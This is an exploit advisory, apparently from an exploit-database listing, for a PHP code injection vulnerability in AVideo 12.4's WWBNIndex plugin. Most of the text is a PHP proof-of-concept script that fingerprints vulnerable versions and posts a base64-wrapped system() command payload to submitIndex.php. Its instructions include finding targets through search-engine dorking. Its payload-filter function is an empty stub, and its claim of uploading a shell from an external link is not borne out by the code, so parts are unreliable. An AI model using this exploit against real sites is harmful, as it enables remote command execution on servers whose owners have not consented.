Headline
AVideo 12.4 Code Injection
AVideo version 12.4 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : AVideo 12.4 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://github.com/WWBN/AVideo/tree/master |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 114 set your target.[+] Line 115 set your commands.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass indoushka{ private $target_uri; private $payload; public function __construct($target_uri, $payload) { $this->target_uri = $target_uri; $this->payload = $payload; } public function exploit() { // إعداد الحمولة $php_code = "<?php " . ($this->isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>"; $filter_payload = $this->generatePhpFilterPayload($php_code); // إرسال الطلب $data = http_build_query(['systemRootPath' => $filter_payload]); $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data); if ($response['code'] !== 200) { echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n"; } } public function check() { $response = $this->sendRequest('GET', '/index.php'); if (!$response) { return 'Failed to connect to the target.'; } if ($response['code'] !== 200) { return "Unexpected HTTP response code: " . $response['code']; } preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match); preg_match('/<!--.*?v:([\d.]+).*?-->/m', $response['body'], $version_match); if (empty($version_match[1])) { return 'Unable to extract AVideo version.'; } $version = $version_match[1]; $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php'); if ($plugin_check['code'] !== 200) { return 'Vulnerable plugin WWBNIndex was not detected'; } if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) { return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running."; } return "Detected non-vulnerable AVideo version: {$version}"; } private function sendRequest($method, $uri, $data = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($method === 'POST') { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return ['code' => $http_code, 'body' => $response]; } private function isArchPHP() { // افترض أن الحمولة عبارة عن كود PHP return true; // أو تحقق من ذلك بناءً على شروط معينة } private function generatePhpFilterPayload($php_code) { // يجب أن تضيف هنا منطق إعداد الحمولة (تصفية) return $php_code; // قم بتعديل ذلك بناءً على متطلباتك }}// مثال على كيفية الاستخدام:$target_uri = "http://target-url.com"; // أدخل عنوان الهدف هنا$payload = "<?php echo 'Hello World!'; ?>"; // الحمولة المراد استخدامها$indoushka = new indoushka($target_uri, $payload);$check_result = $indoushka->check();echo $check_result . "\n";$indoushka->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================